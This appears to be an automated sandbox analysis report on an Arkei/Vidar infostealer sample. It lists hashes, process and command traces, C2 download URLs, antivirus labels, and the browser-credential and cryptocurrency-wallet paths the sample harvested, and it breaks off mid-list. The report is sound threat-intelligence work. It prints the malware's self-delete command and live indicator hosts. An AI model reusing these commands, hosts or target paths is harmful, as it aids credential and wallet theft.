paladin316

1234Arkei_21f7a26bb9e91117169edfd7d3967cfb_exe_2019-09-06_10_30.txt

Sep 6th, 2019
  1.  
  2. * ID: 1234
  3. * MalFamily: "Arkei"  (family label is approximate: the network signature further down fires as "Vidar/Arkei", GData labels the same sample Vidar and Malwarebytes labels it PredatorTheThief — treat the attribution as a stealer-family cluster rather than a definitive build name)
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_21f7a26bb9e91117169edfd7d3967cfb.exe"
  8. * File Size: 1338368
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "7716c84415ccd122f0ad35d15a26b63f09956202c4bb1004e31a5952c771df83"
  11. * MD5: "21f7a26bb9e91117169edfd7d3967cfb"
  12. * SHA1: "89448a5b10e160ccfe85138944a2ff3f988d51b8"
  13. * SHA512: "8e92478041ec3a504b7b59158bfcd6b7bacb21c1c8990be379e0a4099c8a38764ee7a42ccf74b3fff3b57f8464eab2793cbceab516317c5b34164d6f10f59221"
  14. * CRC32: "83995902"
  15. * SSDEEP: "24576:0FooK+7+Qu5HwaFQWC+2tiuxkmPzqPJ9EPZadN1vL9wC7AU6nxpbdK:CKYl0HwaCWC+2AatPzqPJ4QXHc7"
  16.  
  17. * Process Execution:  (this list mixes in Windows and Office background processes that happened to run during the analysis window — services.exe, lsass.exe, svchost.exe, WmiPrvSE.exe, taskeng.exe, msoia.exe, WMIADAP.exe; the sample itself is 9z25yPQnjM.exe, which spawns a second copy of itself and a hidden cmd.exe/taskkill.exe pair per the commands and injection entries below)
  18. "9z25yPQnjM.exe",
  19. "9z25yPQnjM.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "WmiPrvSE.exe",
  26. "svchost.exe",
  27. "taskeng.exe",
  28. "taskeng.exe",
  29. "msoia.exe",
  30. "msoia.exe",
  31. "taskeng.exe",
  32. "WMIADAP.exe"
  33.  
  34.  
  35. * Executed Commands:
  36. "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
  37. "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
  38. "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
  39. "C:\\Windows\\system32\\lsass.exe",
  40. "taskkill /im 9z25yPQnjM.exe /f",
  41. "taskeng.exe 211F1106-53AB-4021-868B-2F49FACAB8E4 S-1-5-18:NT AUTHORITY\\System:Service:",
  42. "taskeng.exe D7A509EA-AB99-4E2A-B99E-04EE4FF35A33 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  43. "taskeng.exe 6E5C69F1-55AA-4A7A-B970-656893D7C708 S-1-5-18:NT AUTHORITY\\System:Service:",
  44. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
  45. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
  46. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
  47. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
  48.  
  49.  
  50. * Signatures Detected:
  51.  
  52. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  53. "Details":
  54.  
  55.  
  56. "Description": "Behavioural detection: Executable code extraction",
  57. "Details":
  58.  
  59.  
  60. "Description": "Creates RWX memory",
  61. "Details":
  62.  
  63.  
  64. "Description": "Anomalous file deletion behavior detected (10+)",
  65. "Details":
  66.  
  67. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp"
  68.  
  69.  
  70. "DeletedFile": "C:\\ProgramData\\freebl3.dll"
  71.  
  72.  
  73. "DeletedFile": "C:\\ProgramData\\mozglue.dll"
  74.  
  75.  
  76. "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
  77.  
  78.  
  79. "DeletedFile": "C:\\ProgramData\\nss3.dll"
  80.  
  81.  
  82. "DeletedFile": "C:\\ProgramData\\softokn3.dll"
  83.  
  84.  
  85. "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
  86.  
  87.  
  88. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt"
  89.  
  90.  
  91. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill"
  92.  
  93.  
  94. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt"
  95.  
  96.  
  97. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC"
  98.  
  99.  
  100. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
  101.  
  102.  
  103. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
  104.  
  105.  
  106. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
  107.  
  108.  
  109. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies"
  110.  
  111.  
  112. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt"
  113.  
  114.  
  115. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt"
  116.  
  117.  
  118. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads"
  119.  
  120.  
  121. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt"
  122.  
  123.  
  124. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History"
  125.  
  126.  
  127. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt"
  128.  
  129.  
  130. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt"
  131.  
  132.  
  133. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg"
  134.  
  135.  
  136. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy"
  137.  
  138.  
  139. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft"
  140.  
  141.  
  142. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin"
  143.  
  144.  
  145. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin"
  146.  
  147.  
  148. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin"
  149.  
  150.  
  151. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore"
  152.  
  153.  
  154. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin"
  155.  
  156.  
  157. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin"
  158.  
  159.  
  160. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash"
  161.  
  162.  
  163. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum"
  164.  
  165.  
  166. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC"
  167.  
  168.  
  169. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum"
  170.  
  171.  
  172. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus"
  173.  
  174.  
  175. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin"
  176.  
  177.  
  178. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko"
  179.  
  180.  
  181. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin"
  182.  
  183.  
  184. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD"
  185.  
  186.  
  187. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin"
  188.  
  189.  
  190. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin"
  191.  
  192.  
  193. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin"
  194.  
  195.  
  196. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX"
  197.  
  198.  
  199. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin"
  200.  
  201.  
  202. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin"
  203.  
  204.  
  205. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin"
  206.  
  207.  
  208. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge"
  209.  
  210.  
  211. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin"
  212.  
  213.  
  214. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin"
  215.  
  216.  
  217. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin"
  218.  
  219.  
  220. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin"
  221.  
  222.  
  223. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash"
  224.  
  225.  
  226. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets"
  227.  
  228.  
  229. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip"
  230.  
  231.  
  232. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe"
  233.  
  234.  
  235. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  236.  
  237.  
  238.  
  239.  
  240. "Description": "Guard pages use detected - possible anti-debugging.",
  241. "Details":
  242.  
  243.  
  244. "Description": "A process attempted to delay the analysis task.",  (note: the only sleeps recorded below come from taskeng.exe and WmiPrvSE.exe, both Windows system processes, not from 9z25yPQnjM.exe — this hit is most likely background noise rather than sandbox evasion by the sample)
  245. "Details":
  246.  
  247. "Process": "taskeng.exe tried to sleep 421 seconds, actually delayed analysis time by 0 seconds"
  248.  
  249.  
  250. "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  251.  
  252.  
  253.  
  254.  
  255. "Description": "Performs HTTP requests potentially not found in PCAP.",  (the six DLLs fetched from dersed.com carry the names of the Mozilla NSS libraries and the MSVC 2015 runtime; they are written to C:\\ProgramData and later deleted per the file lists below, which is consistent with the sample pulling a browser-credential decryption toolkit at run time — the report does not show the DLLs actually being loaded, so verify with a process/module trace if that matters)
  256. "Details":
  257.  
  258. "url_ioc": "dersed.com:80//288"
  259.  
  260.  
  261. "url_ioc": "dersed.com:80//freebl3.dll"
  262.  
  263.  
  264. "url_ioc": "dersed.com:80//mozglue.dll"
  265.  
  266.  
  267. "url_ioc": "dersed.com:80//msvcp140.dll"
  268.  
  269.  
  270. "url_ioc": "dersed.com:80//nss3.dll"
  271.  
  272.  
  273. "url_ioc": "dersed.com:80//softokn3.dll"
  274.  
  275.  
  276. "url_ioc": "dersed.com:80//vcruntime140.dll"
  277.  
  278.  
  279. "url_ioc": "ip-api.com:80//line/"
  280.  
  281.  
  282.  
  283.  
  284. "Description": "A process created a hidden window",
  285. "Details":
  286.  
  287. "Process": "9z25yPQnjM.exe -> C:\\Windows\\System32\\cmd.exe"
  288.  
  289.  
  290. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
  291.  
  292.  
  293.  
  294.  
  295. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  296. "Details":
  297.  
  298. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  299.  
  300.  
  301. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  302.  
  303.  
  304. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  305.  
  306.  
  307. "suspicious_request_iocs": "http://dersed.com/288"
  308.  
  309.  
  310. "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
  311.  
  312.  
  313. "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
  314.  
  315.  
  316. "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
  317.  
  318.  
  319. "suspicious_request_iocs": "http://dersed.com/nss3.dll"
  320.  
  321.  
  322. "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
  323.  
  324.  
  325. "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
  326.  
  327.  
  328. "suspicious_request_iocs": "http://ip-api.com/line/"
  329.  
  330.  
  331. "suspicious_request_iocs": "http://dersed.com/"
  332.  
  333.  
  334.  
  335.  
  336. "Description": "Performs some HTTP requests",
  337. "Details":
  338.  
  339. "url_iocs": "http://dersed.com/288"
  340.  
  341.  
  342. "url_iocs": "http://dersed.com/freebl3.dll"
  343.  
  344.  
  345. "url_iocs": "http://dersed.com/mozglue.dll"
  346.  
  347.  
  348. "url_iocs": "http://dersed.com/msvcp140.dll"
  349.  
  350.  
  351. "url_iocs": "http://dersed.com/nss3.dll"
  352.  
  353.  
  354. "url_iocs": "http://dersed.com/softokn3.dll"
  355.  
  356.  
  357. "url_iocs": "http://dersed.com/vcruntime140.dll"
  358.  
  359.  
  360. "url_iocs": "http://ip-api.com/line/"
  361.  
  362.  
  363. "url_iocs": "http://dersed.com/"
  364.  
  365.  
  366.  
  367.  
  368. "Description": "The binary likely contains encrypted or compressed data.",
  369. "Details":
  370.  
  371. "section": "name: .rsrc, entropy: 7.94, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x000dd400, virtual_size: 0x000dd3c8"
  372.  
  373.  
  374.  
  375.  
  376. "Description": "Uses Windows utilities for basic functionality",
  377. "Details":
  378.  
  379. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  380.  
  381.  
  382. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  383.  
  384.  
  385. "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  386.  
  387.  
  388.  
  389.  
  390. "Description": "Behavioural detection: Injection (Process Hollowing)",
  391. "Details":
  392.  
  393. "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
  394.  
  395.  
  396.  
  397.  
  398. "Description": "Executed a process and injected code into it, probably while unpacking",
  399. "Details":
  400.  
  401. "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
  402.  
  403.  
  404.  
  405.  
  406. "Description": "Deletes its original binary from disk",
  407. "Details":
  408.  
  409.  
  410. "Description": "Behavioural detection: Injection (inter-process)",
  411. "Details":
  412.  
  413.  
  414. "Description": "Steals private information from local Internet browsers",
  415. "Details":
  416.  
  417. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
  418.  
  419.  
  420. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
  421.  
  422.  
  423. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  424.  
  425.  
  426. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  430.  
  431.  
  432. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  436.  
  437.  
  438.  
  439.  
  440. "Description": "Collects information about installed applications",
  441. "Details":
  442.  
  443. "Program": "Google Update Helper"
  444.  
  445.  
  446. "Program": "Microsoft Excel MUI 2013"
  447.  
  448.  
  449. "Program": "Microsoft Outlook MUI 2013"
  450.  
  451.  
  452.  
  453.  
  454. "Program": "Google Chrome"
  455.  
  456.  
  457. "Program": "Adobe Flash Player 29 NPAPI"
  458.  
  459.  
  460. "Program": "Adobe Flash Player 29 ActiveX"
  461.  
  462.  
  463. "Program": "Microsoft DCF MUI 2013"
  464.  
  465.  
  466. "Program": "Microsoft Access MUI 2013"
  467.  
  468.  
  469. "Program": "Microsoft Office Proofing Tools 2013 - English"
  470.  
  471.  
  472. "Program": "Adobe Acrobat Reader DC"
  473.  
  474.  
  475. "Program": "Microsoft Office Proofing Tools 2013 - Español"
  476.  
  477.  
  478. "Program": "Microsoft Publisher MUI 2013"
  479.  
  480.  
  481. "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
  482.  
  483.  
  484. "Program": "Microsoft Office Shared MUI 2013"
  485.  
  486.  
  487. "Program": "Microsoft Office OSM MUI 2013"
  488.  
  489.  
  490. "Program": "Microsoft InfoPath MUI 2013"
  491.  
  492.  
  493. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  494.  
  495.  
  496. "Program": "Microsoft Word MUI 2013"
  497.  
  498.  
  499. "Program": "Microsoft Groove MUI 2013"
  500.  
  501.  
  502.  
  503.  
  504. "Program": "Microsoft Access Setup Metadata MUI 2013"
  505.  
  506.  
  507. "Program": "Microsoft Office OSM UX MUI 2013"
  508.  
  509.  
  510. "Program": "Java Auto Updater"
  511.  
  512.  
  513. "Program": "Microsoft PowerPoint MUI 2013"
  514.  
  515.  
  516. "Program": "Microsoft Office Professional Plus 2013"
  517.  
  518.  
  519. "Program": "Adobe Refresh Manager"
  520.  
  521.  
  522. "Program": "Microsoft Office Proofing 2013"
  523.  
  524.  
  525.  
  526.  
  527. "Program": "Microsoft OneNote MUI 2013"
  528.  
  529.  
  530.  
  531.  
  532. "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
  533. "Details":
  534.  
  535. "MicroWorld-eScan": "Trojan.GenericKD.32391018"
  536.  
  537.  
  538. "McAfee": "Artemis!21F7A26BB9E9"
  539.  
  540.  
  541. "CrowdStrike": "win/malicious_confidence_100% (W)"
  542.  
  543.  
  544. "BitDefender": "Trojan.GenericKD.32391018"
  545.  
  546.  
  547. "K7GW": "Riskware ( 0040eff71 )"
  548.  
  549.  
  550. "K7AntiVirus": "Riskware ( 0040eff71 )"
  551.  
  552.  
  553. "TrendMicro": "Mal_HPGen-37b"
  554.  
  555.  
  556. "Symantec": "ML.Attribute.HighConfidence"
  557.  
  558.  
  559. "ESET-NOD32": "a variant of Win32/GenKryptik.DSFF"
  560.  
  561.  
  562. "APEX": "Malicious"
  563.  
  564.  
  565. "Paloalto": "generic.ml"
  566.  
  567.  
  568. "GData": "Win32.Trojan-Stealer.Vidar.HFQMXD"
  569.  
  570.  
  571. "Kaspersky": "Trojan.Win32.Chapak.dywh"
  572.  
  573.  
  574. "Avast": "FileRepMetagen Malware"
  575.  
  576.  
  577. "Endgame": "malicious (high confidence)"
  578.  
  579.  
  580. "Sophos": "Mal/Generic-S"
  581.  
  582.  
  583. "F-Secure": "Trojan.TR/Chapak.pfzxh"
  584.  
  585.  
  586. "Invincea": "heuristic"
  587.  
  588.  
  589. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.tc"
  590.  
  591.  
  592. "Trapmine": "suspicious.low.ml.score"
  593.  
  594.  
  595. "FireEye": "Generic.mg.21f7a26bb9e91117"
  596.  
  597.  
  598. "Emsisoft": "Trojan.GenericKD.32391018 (B)"
  599.  
  600.  
  601. "Avira": "TR/Chapak.pfzxh"
  602.  
  603.  
  604. "Microsoft": "Trojan:Win32/Tiggre!plock"
  605.  
  606.  
  607. "Arcabit": "Trojan.Generic.D1EE3F6A"
  608.  
  609.  
  610. "AegisLab": "Trojan.Win32.Chapak.4!c"
  611.  
  612.  
  613. "ZoneAlarm": "Trojan.Win32.Chapak.dywh"
  614.  
  615.  
  616. "Acronis": "suspicious"
  617.  
  618.  
  619. "VBA32": "BScope.TrojanPSW.Zbot"
  620.  
  621.  
  622. "Ad-Aware": "Trojan.GenericKD.32391018"
  623.  
  624.  
  625. "Malwarebytes": "Spyware.PredatorTheThief"
  626.  
  627.  
  628. "TrendMicro-HouseCall": "Mal_HPGen-37b"
  629.  
  630.  
  631. "Rising": "Trojan.Generic@ML.89 (RDML:DwZEfvt+IvzJSolmz/PxXA)"
  632.  
  633.  
  634. "Ikarus": "Trojan.Crypt"
  635.  
  636.  
  637. "Fortinet": "W32/Kryptik.GVSM!tr"
  638.  
  639.  
  640. "AVG": "FileRepMetagen Malware"
  641.  
  642.  
  643. "Qihoo-360": "Win32/Trojan.abe"
  644.  
  645.  
  646.  
  647.  
  648. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  649. "Details":
  650.  
  651.  
  652. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  653. "Details":
  654.  
  655. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  656.  
  657.  
  658. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12"
  659.  
  660.  
  661. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\*.*"
  662.  
  663.  
  664. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
  665.  
  666.  
  667. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  668.  
  669.  
  670. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\*.*"
  671.  
  672.  
  673. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  674.  
  675.  
  676. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n"
  677.  
  678.  
  679. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  680.  
  681.  
  682. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\"
  683.  
  684.  
  685. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  686.  
  687.  
  688. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\*.*"
  689.  
  690.  
  691. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\*.*"
  692.  
  693.  
  694. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  695.  
  696.  
  697. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\"
  698.  
  699.  
  700. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  701.  
  702.  
  703. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\*.*"
  704.  
  705.  
  706. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  707.  
  708.  
  709. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\"
  710.  
  711.  
  712. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  713.  
  714.  
  715. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  716.  
  717.  
  718. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\"
  719.  
  720.  
  721. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  722.  
  723.  
  724. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\*.*"
  725.  
  726.  
  727. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  728.  
  729.  
  730. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\"
  731.  
  732.  
  733. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\*.*"
  734.  
  735.  
  736. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  737.  
  738.  
  739. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\"
  740.  
  741.  
  742. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  743.  
  744.  
  745. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  746.  
  747.  
  748. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\*.*"
  749.  
  750.  
  751. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  752.  
  753.  
  754. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\"
  755.  
  756.  
  757. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  758.  
  759.  
  760. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\*.*"
  761.  
  762.  
  763. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  764.  
  765.  
  766. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\"
  767.  
  768.  
  769. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\*.*"
  770.  
  771.  
  772. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  773.  
  774.  
  775. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  776.  
  777.  
  778. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\*.*"
  779.  
  780.  
  781. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  782.  
  783.  
  784. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\"
  785.  
  786.  
  787. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  788.  
  789.  
  790. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\"
  791.  
  792.  
  793. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\*.*"
  794.  
  795.  
  796. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  797.  
  798.  
  799. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\"
  800.  
  801.  
  802. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\*.*"
  803.  
  804.  
  805. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  806.  
  807.  
